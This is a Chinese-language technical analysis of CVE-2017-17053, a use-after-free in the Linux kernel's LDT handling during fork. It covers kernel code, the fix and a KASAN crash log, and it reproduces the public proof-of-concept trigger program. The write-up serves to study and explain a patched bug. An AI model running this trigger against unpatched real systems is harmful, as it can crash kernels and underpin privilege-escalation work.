1. 漏洞信息
- 漏洞等级:高
- 漏洞类型:UAF
- 攻击向量:本地
- 权限要求:低
- 利用公开:否
- 影响范围:<= 4.12.10
- 漏洞补丁:Linux
commit id
:ccd5b3235180eef3cfec337df1c8554ab151b5cc
- 修补日期:2017-08-25
2. CONFIG_MODIFY_LDT_SYSCALL 编译选项简介
要想触发此漏洞,所采用内核需要开启CONFIG_MODIFY_LDT_SYSCALL
编译选项。虽然该编译选项所支持的功能已经不常用了,但是,这个编译选项在常规的Linux内核编译过程中是默认开启的。在一些需要运行16位汇编指令的程序中可能会用到,比如DOSEMU
和wine
。 开了CONFIG_MODIFY_LDT_SYSCALL
编译选项后,就可以使用modify_ldt(2)
这个系统调用了。modify_ldt()
系统调用可以对内核LDT
(local descriptor table )进行读写操作。而这个系统调用就是CVE-2017-17053漏洞产生的一个诱因(注意:不是漏洞点)。
3. 漏洞简述
UAF(Use-After-Free)漏洞在内存中发生的对象是struct ldt_struct ,该对象可以通过modify_ldt()
系统调用进行分配。在内核中具体分配该对象的函数是alloc_ldt_struct()
,其上层函数是init_new_context_ldt()
。在执行fork()
系统调用内核拷贝父进程内存资源时,也会把父进程的ldt_struct
进行拷贝。不过由于比较低级的编码错误,如果alloc_ldt_struct()
执行失败,接着init_new_context_ldt()
进行相应的错误处理,但init_new_context_ldt()
上层函数init_new_context
没有返回相应的错误值,结果无论成功与否都返回0。那么这就导致mm->context.ldt
指向的ldt_struct
没有及时更新,仍然残留着父进程的ldt_struct
。如果该子进程退出并释放这块ldt_struct
,但是父进程仍然保持着对这块对象的引用,那么最终就会产生UAF漏洞。
4. 漏洞还原
- Linux内核版本:
v4.12.10
- 还原所用commit id :
6dd29b3df975582ef429b5b93c899e6575785940
- 涉及文件:
arch/x86/include/asm/mmu_context.h
在commit id
:ccd5b3235180eef3cfec337df1c8554ab151b5cc
补丁信息中,提供了一份PoC:
#include <stdio.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
static void *fork_thread(void *_arg)
{
fork(); // B
}
int main(void)
{
struct user_desc desc = { .entry_number = 8191 }; // D
syscall(__NR_modify_ldt, 1, &desc, sizeof(desc)); // A
for (;;) {
if (fork() == 0) {
pthread_t t;
// srand(getpid());
pthread_create(&t, NULL, fork_thread, NULL);
// usleep(rand() % 10000);
syscall(__NR_exit_group, 0); // C
}
wait(NULL);
}
}
编译:
$ gcc poc.c -o cve-2017-17053-poc -pthread
触发结果:
[ 53.627718] BUG: KASAN: use-after-free in free_ldt_struct.part.3+0x81/0x90
[ 53.628663] Read of size 4 at addr ffff88006c749208 by task cve-2017-17053-/5426
[ 53.629858]
[ 53.630065] CPU: 6 PID: 5426 Comm: cve-2017-17053- Not tainted 4.12.10+ #8
[ 53.630992] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014
[ 53.632203] Call Trace:
[ 53.632545] dump_stack+0x4d/0x72
[ 53.633062] print_address_description+0x6a/0x280
[ 53.633743] ? free_ldt_struct.part.3+0x81/0x90
[ 53.634371] kasan_report+0x22b/0x340
[ 53.634883] __asan_report_load4_noabort+0x14/0x20
[ 53.635569] free_ldt_struct.part.3+0x81/0x90
[ 53.636183] destroy_context_ldt+0x60/0x80
[ 53.636740] __mmdrop+0x4f/0x210
[ 53.637279] finish_task_switch+0x37e/0x500
[ 53.637942] schedule_tail+0xe/0xf0
[ 53.638508] ret_from_fork+0x8/0x30
[ 53.639065] RIP: 0033:0x7f034ce2a2d1
[ 53.639636] RSP: 002b:00007f034cd4aff0 EFLAGS: 00000206 ORIG_RAX: 0000000000000038
[ 53.640754] RAX: 0000000000000000 RBX: 00007f034cd4b700 RCX: 00007f034ce2a2d1
[ 53.641836] RDX: 00007f034cd4b9d0 RSI: 00007f034cd4aff0 RDI: 00000000003d0f00
[ 53.642733] RBP: 0000000000000000 R08: 00007f034cd4b700 R09: 00007f034cd4b700
[ 53.643538] R10: 00007f034cd4b9d0 R11: 0000000000000206 R12: 00007f034d0ea220
[ 53.644308] R13: 00007f034cd4b9c0 R14: 00007f034d515040 R15: 0000000000000003
[ 53.645096]
[ 53.645279] Allocated by task 2745:
[ 53.645719] save_stack_trace+0x16/0x20
[ 53.646144] save_stack+0x46/0xd0
[ 53.646505] kasan_kmalloc+0xad/0xe0
[ 53.646867] kmem_cache_alloc_trace+0xcd/0x180
[ 53.647277] alloc_ldt_struct+0x52/0x140
[ 53.647634] init_new_context_ldt+0xe2/0x2e0
[ 53.648027] mm_init.isra.46+0x5c7/0x7e0
[ 53.648391] copy_process.part.52+0x1d66/0x50c0
[ 53.648804] _do_fork+0x133/0x7a0
[ 53.649175] SyS_clone+0x14/0x20
[ 53.649502] do_syscall_64+0x173/0x380
[ 53.649847] return_from_SYSCALL_64+0x0/0x6a
[ 53.650238]
[ 53.650381] Freed by task 5417:
[ 53.650669] save_stack_trace+0x16/0x20
[ 53.651023] save_stack+0x46/0xd0
[ 53.651332] kasan_slab_free+0x72/0xc0
[ 53.651675] kfree+0x8f/0x190
[ 53.651915] free_ldt_struct.part.3+0x63/0x90
[ 53.652258] destroy_context_ldt+0x60/0x80
[ 53.652576] __mmdrop+0x4f/0x210
[ 53.652843] mmput+0x1f8/0x270
[ 53.653115] copy_process.part.52+0x1647/0x50c0
[ 53.653469] _do_fork+0x133/0x7a0
[ 53.653734] SyS_clone+0x14/0x20
[ 53.653992] do_syscall_64+0x173/0x380
[ 53.654293] return_from_SYSCALL_64+0x0/0x6a
5. 漏洞分析
之前有个安全研究员分享了一篇该漏洞的安全分析2017-08-25, 该文章分析比较清晰简洁,但是针对使得alloc_ldt_struct()
执行失败的方式,文中末尾一带而过并没有过多分析。笔者此次文章旨在重新理清思路,并针对某些细节进行详细分析。
1) ldt_struct
对象分配
ldt_struct
对象由alloc_ldt_struct()
分配,在v4.12.10内核代码中搜索,该函数可以看到有如下两处引用:
In folder /home/xxxx/git_new/linux-stable
Found 3 matches for C symbol: alloc_ldt_struct
--------------------------------------------------
arch/x86/kernel/ldt.c:
37 [scope: alloc_ldt_struct] static struct ldt_struct *alloc_ldt_struct(int size)
..
125 [scope: init_new_context] new_ldt = alloc_ldt_struct(old_mm->context.ldt->size);
..
255 [scope: write_ldt] new_ldt = alloc_ldt_struct(newsize);
分别是由write_ldt()
和init_new_context_ldt()
引用,如下:
write_ldt()
static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{
struct mm_struct *mm = current->mm;
struct ldt_struct *new_ldt, *old_ldt;
unsigned int oldsize, newsize;
struct user_desc ldt_info;
struct desc_struct ldt;
int error;
error = -EINVAL;
... snip ...
mutex_lock(&mm->context.lock);
old_ldt = mm->context.ldt;
oldsize = old_ldt ? old_ldt->size : 0;
newsize = max(ldt_info.entry_number + 1, oldsize);
error = -ENOMEM;
new_ldt = alloc_ldt_struct(newsize);// <-------------------
if (!new_ldt)
goto out_unlock;
... snip ...
out_unlock:
mutex_unlock(&mm->context.lock);
out:
return error;
}
init_new_context_ldt()
int init_new_context_ldt(struct task_struct *tsk, struct mm_struct *mm)
{
struct ldt_struct *new_ldt;
struct mm_struct *old_mm;
int retval = 0;
... snip ...
new_ldt = alloc_ldt_struct(old_mm->context.ldt->size);// <-------------------
if (!new_ldt) {
retval = -ENOMEM;
goto out_unlock;
}
memcpy(new_ldt->entries, old_mm->context.ldt->entries,
new_ldt->size * LDT_ENTRY_SIZE);
finalize_ldt_struct(new_ldt);
mm->context.ldt = new_ldt;// <-------------------
out_unlock:
mutex_unlock(&old_mm->context.lock);
return retval;
}
以上两个函数都会调用alloc_ldt_struct()
,并且会有相应的函数返回错误码检查。
经过分析,其中到达write_ldt()
的内核函数序列是:sys_modify_ldt() -> write_ldt() -> alloc_ldt_struct()
。到达init_new_context()
的函数序列是:sys_clone() -> _do_fork() -> copy_process() -> mm_init() -> init_new_context() -> init_new_context_ldt() -> alloc_ldt_struct()
。
当分配完ldt_struct
,将会把该对象的地址赋给mm_context_t
结构体的成员变量struct ldt_struct *
,mm_context_t
又是mm_struct
的成员变量,所以最终mm_struct
将会包含一个指向ldt_struct
对象的指针。例如init_new_context_ldt()
有个赋值点:
int init_new_context_ldt(struct task_struct *tsk, struct mm_struct *mm)
{
... snip ...
mm->context.ldt = new_ldt;// <-------------------
... snip ...
}
如果要想在mm_struct
结构体中包含一个指向ldt_struct
对象的有效指针,通过以上分析出的调用序列,我们在用户态使用modify_ldt()
系统调用即可。如PoC中A
处所示。
2)ldt_struct
在fork()
中的拷贝与创建
modify_ldt()
执行完后,当用户态发生fork()
系统调用创建子进程时(如PoC 的B
处),内核将会拷贝相应的父进程内存资源,如下:
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
... snip ...
/* Perform scheduler related setup. Assign this task to a CPU. */
retval = sched_fork(clone_flags, p);
if (retval)
goto bad_fork_cleanup_policy;
retval = perf_event_init_task(p);
if (retval)
goto bad_fork_cleanup_policy;
retval = audit_alloc(p);
if (retval)
goto bad_fork_cleanup_perf;
/* copy all the process information */
shm_init_task(p);
retval = security_task_alloc(p, clone_flags);
if (retval)
goto bad_fork_cleanup_audit;
retval = copy_semundo(clone_flags, p);
if (retval)
goto bad_fork_cleanup_security;
retval = copy_files(clone_flags, p);
if (retval)
goto bad_fork_cleanup_semundo;
retval = copy_fs(clone_flags, p);
if (retval)
goto bad_fork_cleanup_files;
retval = copy_sighand(clone_flags, p);
if (retval)
goto bad_fork_cleanup_fs;
retval = copy_signal(clone_flags, p);
if (retval)
goto bad_fork_cleanup_sighand;
retval = copy_mm(clone_flags, p);// <-------------------
if (retval)
goto bad_fork_cleanup_signal;
retval = copy_namespaces(clone_flags, p);
if (retval)
goto bad_fork_cleanup_mm;
retval = copy_io(clone_flags, p);
if (retval)
goto bad_fork_cleanup_namespaces;
retval = copy_thread_tls(clone_flags, stack_start, stack_size, p, tls);
if (retval)
goto bad_fork_cleanup_io;
if (pid != &init_struct_pid) {
pid = alloc_pid(p->nsproxy->pid_ns_for_children);
if (IS_ERR(pid)) {
retval = PTR_ERR(pid);
goto bad_fork_cleanup_thread;
}
}
... snip ...
}
在copy_process()
中,涉及到ldt_struct
对象指针拷贝的点是在dup_mm()
中,内核函数调用序列是...snip.. -> copy_process() -> copy_mm() -> dup_mm()
。其中dup_mm()
中涉及ldt_struct
对象的拷贝操作(struct mm_struct *
包含ldt_struct
指针)如下所示。由于使用了modify_ldt()
系统调用,父进程的mm_struct
定然会包含已经分配的ldt_struct
指针,所以memcpy()
后,新的mm_struct
中会包含父进程的ldt_struct
对象指针。
static struct mm_struct *dup_mm(struct task_struct *tsk)
{
... snip ...
mm = allocate_mm();
if (!mm)
goto fail_nomem;
memcpy(mm, oldmm, sizeof(*mm)); // <-------------------拷贝点
if (!mm_init(mm, tsk, mm->user_ns)) // <-------------------
goto fail_nomem;
... snip ...
fail_nomem:
return NULL;
}
接着进入mm_init()
函数,该函数就是对新创建的mm_struct
进行初始化工作,其中就包含创建新ldt_struct
的操作,也就是将要执行上文提到的init_new_context()
:
static struct mm_struct *mm_init(struct mm_struct *mm, struct task_struct *p,
struct user_namespace *user_ns)
{
... snip ...
if (init_new_context(p, mm)) // <-------------------
goto fail_nocontext;
mm->user_ns = get_user_ns(user_ns);
return mm;
fail_nocontext:
mm_free_pgd(mm);
fail_nopgd:
free_mm(mm);
return NULL;
}
3) 漏洞代码
接着继续分析 init_new_context()
,init_new_context()
中又会调用init_new_context_ldt()
,如下所示:
static inline int init_new_context(struct task_struct *tsk,
struct mm_struct *mm)
{
#ifdef CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS
if (cpu_feature_enabled(X86_FEATURE_OSPKE)) {
/* pkey 0 is the default and always allocated */
mm->context.pkey_allocation_map = 0x1;
/* -1 means unallocated or invalid */
mm->context.execute_only_pkey = -1;
}
#endif
init_new_context_ldt(tsk, mm); // <------------------- 漏洞点
return 0;
}
init_new_context_ldt()
上文已分析,会返回一个int型整数值,主要是判断alloc_ldt_struct()
是否成功分配ldt_struct
。按照鲁棒性的代码编程原则,如果alloc_ldt_struct()
执行失败,init_new_context_ldt(tsk, mm);
本应该返回一个错误码,并对其进行错误判断然后进入相应的错误处理流程。但是这里对init_new_context_ldt()
的返回值没有加判断,而是直接返回0,这就导致init_new_context
无论失败与否,最终的结果都将认为它返回成功。
上文已经提到,init_new_context_ldt()
会调用alloc_ldt_struct()
分配一个新的ldt_struct
对象,并更新mm->context.ldt
指针,覆盖掉之前从父进程拷贝来的旧指针。如果alloc_ldt_struct()
执行失败直接返回,则不会更新mm->context.ldt
的旧指针。而且由于init_new_context()
没有对返回值的判断,当作分配成功处理,那么此时子进程中的mm_struct
仍然包含着父进程残留的mm->context.ldt
指针。假设该子进程退出(如PoC的C
处,使用exit_group
内核会产生fatal signal),并执行相应内存释放函数,那么mm->context.ldt
所指向的属于父进程的对象ldt_struct
也会进行释放, 如下代码片段所示。在之后的过程中该对象指针仍然被父进程所能引用,那么最终就会在ldt_struct
对象上产生UAF漏洞。
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
int retval;
... snip ...
recalc_sigpending();
if (signal_pending(current)) { // <------------------- 一种退出进程的触发方式
retval = -ERESTARTNOINTR;
goto bad_fork_cancel_cgroup;
}
... snip ...
bad_fork_cancel_cgroup:
spin_unlock(&current->sighand->siglock);
write_unlock_irq(&tasklist_lock);
cgroup_cancel_fork(p);
bad_fork_free_pid:
cgroup_threadgroup_change_end(current);
if (pid != &init_struct_pid)
free_pid(pid);
... snip ...
delayacct_tsk_free(p);
bad_fork_cleanup_count:
atomic_dec(&p->cred->user->processes);
exit_creds(p);
bad_fork_free:
p->state = TASK_DEAD;
put_task_stack(p);
free_task(p);
fork_out:
return ERR_PTR(retval);
}
4)如何使alloc_ldt_struct()
失败
至此,漏洞原理和触发流程基本分析清楚,但是仍然有一个疑点(也是重点)还悬而未决。那就是在用户态通过何种方式,能使得alloc_ldt_struct()
执行失败呢?
先分析下alloc_ldt_struct()
的代码:
static struct ldt_struct *alloc_ldt_struct(unsigned int size)
{
struct ldt_struct *new_ldt;
unsigned int alloc_size;
if (size > LDT_ENTRIES)
return NULL;
new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
if (!new_ldt)
return NULL;
BUILD_BUG_ON(LDT_ENTRY_SIZE != sizeof(struct desc_struct));
alloc_size = size * LDT_ENTRY_SIZE;
if (alloc_size > PAGE_SIZE)
new_ldt->entries = vzalloc(alloc_size); // <-------------------
else
new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL);
if (!new_ldt->entries) {
kfree(new_ldt);
return NULL;
}
new_ldt->size = size;
return new_ldt;
}
代码中会使用kmalloc
分配ldt_struct
,但是我们的目的是让alloc_ldt_struct()
返回失败,也就是返回为NULL。可以很容易发现,当new_ldt->entries
为NULL时,则最终返回结果为NULL,且影响其结果的有这两句:new_ldt->entries = vzalloc(alloc_size);
和new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL);
,后者我们并不可控,而前者是可控的,因为size
参数可以在用户态指定并传入内核,如PoC的D
处。并且需要满足size * LDT_ENTRY_SIZE > PAGE_SIZE且size <= LDT_ENTRIES(8192)(PoC中entry_number为8191,对应的size为8192)
。
vzalloc()
最终会调用__vmalloc_area_node()
,采用的是vmalloc
内存分配方案:
static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
pgprot_t prot, int node)
{
... snip ...
for (i = 0; i < area->nr_pages; i++) {
struct page *page;
if (fatal_signal_pending(current)) { // <-------------------
area->nr_pages = i;
goto fail_no_warn;
}
if (node == NUMA_NO_NODE)
page = alloc_page(alloc_mask|highmem_mask);
else
page = alloc_pages_node(node, alloc_mask|highmem_mask, 0);
if (unlikely(!page)) {
/* Successfully allocated i pages, free them in __vunmap() */
area->nr_pages = i;
goto fail;
}
area->pages[i] = page;
if (gfpflags_allow_blocking(gfp_mask|highmem_mask))
cond_resched();
}
... snip ...
fail_no_warn:
vfree(area->addr);
return NULL; // <-------------------
}
其中fatal_signal_pending(current)
如果接收到fatal signal
( syscall(__NR_exit_group, 0);
),那么会直接返回NULL,最终alloc_ldt_struct()
也会执行失败。
在补丁信息中(commit id
: ccd5b3235180eef3cfec337df1c8554ab151b5cc
),有提供如下信息:
Note: the reproducer takes advantage of the fact that alloc_ldt_struct()
may use vmalloc() to allocate a large ->entries array, and after
commit:
5d17a73a2ebe ("vmalloc: back off when the current task is killed")
it is possible for userspace to fail a task's vmalloc() by
sending a fatal signal, e.g. via exit_group(). It would be more
difficult to reproduce this bug on kernels without that commit.
5d17a73a2ebe ("vmalloc: back off when the current task is killed")
,显示在vmalloc
内核内存分配方式下,如果任务被kill掉,那么vmalloc会提前进行返回。这么做的目的也是为了节约系统内存,以防内存资源滥用。具体5d17a73a2ebe
commit细节如下:
root@xxx:~/git_new/linux-stable# git show 5d17a73a2ebe
commit 5d17a73a2ebeb8d1c6924b91e53ab2650fe86ffb
Author: Michal Hocko <mhocko@suse.com>
Date: Fri Feb 24 14:58:53 2017 -0800
vmalloc: back off when the current task is killed
__vmalloc_area_node() allocates pages to cover the requested vmalloc
size. This can be a lot of memory. If the current task is killed by
the OOM killer, and thus has an unlimited access to memory reserves, it
can consume all the memory theoretically. Fix this by checking for
fatal_signal_pending and back off early.
Link: http://lkml.kernel.org/r/20170201092706.9966-4-mhocko@kernel.org
Signed-off-by: Michal Hocko <mhocko@suse.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Cc: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
diff --git a/mm/vmalloc.c b/mm/vmalloc.c
index d89034a393f2..011b446f8758 100644
--- a/mm/vmalloc.c
+++ b/mm/vmalloc.c
@@ -1642,6 +1642,11 @@ static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
for (i = 0; i < area->nr_pages; i++) {
struct page *page;
+ if (fatal_signal_pending(current)) {
+ area->nr_pages = i;
+ goto fail;
+ }
+
if (node == NUMA_NO_NODE)
page = alloc_page(alloc_mask);
else
6. 漏洞补丁
Diffstat
-rw-r--r-- arch/x86/include/asm/mmu_context.h 4
1 files changed, 1 insertions, 3 deletions
diff --git a/arch/x86/include/asm/mmu_context.h b/arch/x86/include/asm/mmu_context.h
index 265c907..7a234be 100644
--- a/arch/x86/include/asm/mmu_context.h
+++ b/arch/x86/include/asm/mmu_context.h
@@ -140,9 +140,7 @@ static inline int init_new_context(struct task_struct *tsk,
mm->context.execute_only_pkey = -1;
}
#endif
- init_new_context_ldt(tsk, mm);
-
- return 0;
+ return init_new_context_ldt(tsk, mm);
}
static inline void destroy_context(struct mm_struct *mm)
{
7. 总结
虽然漏洞是由于较为低级的编码错误所引入的,且补丁也较为简单,但是其中涉及的细节还是极有意思的,比如:内核中fork进程的细节和vmalloc
分配时所受外界的影响。另外这种漏洞模型也是值得继续探究的。关于此漏洞的漏洞利用,笔者认为其利用的难度较大。因为fork、exit_group和alloc_ldt_struct三者发生的时机较为紧凑,这就导致利用时refill object难度提高不少。如果你有该漏洞利用的思路或者发现我的漏洞分析有什么错误,欢迎联系我,对我进行批评斧正。
qq: 3453203911